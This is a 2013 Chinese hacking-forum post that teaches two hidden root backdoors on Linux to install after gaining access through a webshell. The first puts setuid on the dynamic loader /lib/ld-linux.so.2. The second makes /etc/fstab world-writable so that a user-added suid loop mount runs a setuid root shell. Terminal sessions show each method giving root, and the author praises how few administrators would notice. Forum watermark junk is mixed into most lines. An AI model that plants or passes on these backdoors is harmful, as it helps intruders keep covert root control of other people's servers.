中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究# j7 l3 M4 b4 p; ?) o2 ^8 R
& l/ J$ k$ ^* ]. u
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
5 b' J& t% Y7 Z4 z: Z8 u: b7 mlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究( x4 D/ U1 ]2 e% i! V
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
' S: F, n5 U6 c) m3 w6 D, D[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
8 N& J" B2 X; A& {[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
# G  V! r; _6 C-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究6 y. U4 l' F9 A) j
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
5 o1 L" a& o* X( B) d[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究6 ?+ v% d. I: o8 E5 l. r" [
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究- V# v* W- o. v& N

6 r7 A' F" w4 H普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
4 ?# [' w. q4 T/ s0 P9 f: g; Y  u& [2 F3 w: F% @, Q5 t  ~
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
+ G4 K3 i7 O- n! r3 @) I2 c  @' ~, Pxiaoyu2ezX-BUG-关注前沿信息安全技术研究
8 O' ^/ D) W+ A7 e* f+ `7 l[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究% N; F/ \% f$ ?0 p8 Q! E
root2ezX-BUG-关注前沿信息安全技术研究; x) Z' R$ K& n" l
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
  n* R# `7 ?% s: _# x6 [恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
# |5 K. @9 `) J" u" b2 r
0 I. \& O+ P/ }& o8 W8 ~2 e0 m# H方法二:2ezX-BUG-关注前沿信息安全技术研究7 m" ]$ s( I# ~, R  b2 J

; n; I. W- O$ _( `* ~看过程:2ezX-BUG-关注前沿信息安全技术研究
, C5 X6 c: T/ m3 G8 O9 b  r* A1 |" g! n6 I9 p( r
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究( J' I% s' T9 _% C* G* K* a
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究% q; }9 Z5 [" W
/ i# l9 m$ h/ w) v+ J3 p4 j
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
! ?6 U0 M2 V% }
/ r5 C( X9 X8 M$ V0 g& T[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究- I# f' O' x8 V- ~6 {2 w  V) M% i
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究# C6 h0 e) V) a! P) H
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究1 N, E1 J5 R* o& t( a, ~' N
  D6 }% U1 E0 o( G7 f' x
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究2 I' l' Z1 _& {  Z2 F) h; f
% `# B' x3 V8 y
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
( R0 q$ P( M: S9 Q9 H6 ~0 q-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究, N2 {& {  w, \% K
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
2 [' P/ @2 W  i[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究! l% h* P/ [* E# N, d
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究0 c  }9 w9 r1 P" ?9 ]) M* [+ Q
total 182ezX-BUG-关注前沿信息安全技术研究
! _+ T: d1 Y. {; U0 K0 mdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究0 O$ H, V( c& J
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究3 R) F0 J7 x* F
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究- ?5 p( n& `& }# c5 }+ D$ h! X& O
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
4 N+ v# ^% L$ G看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
: Y3 o* J$ c' y7 C, H/ gtest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究! K, |' F$ l$ G; L& k9 X
: y- x$ ~6 ?/ i) J! C0 Y/ G  l
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究& I- }4 c8 P) w( i0 l( P" h
2ezX-BUG-关注前沿信息安全技术研究
4 ]" o; n4 s% y# e6 z) |4 `, T8 N- s( T# \% |& r& [+ X
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2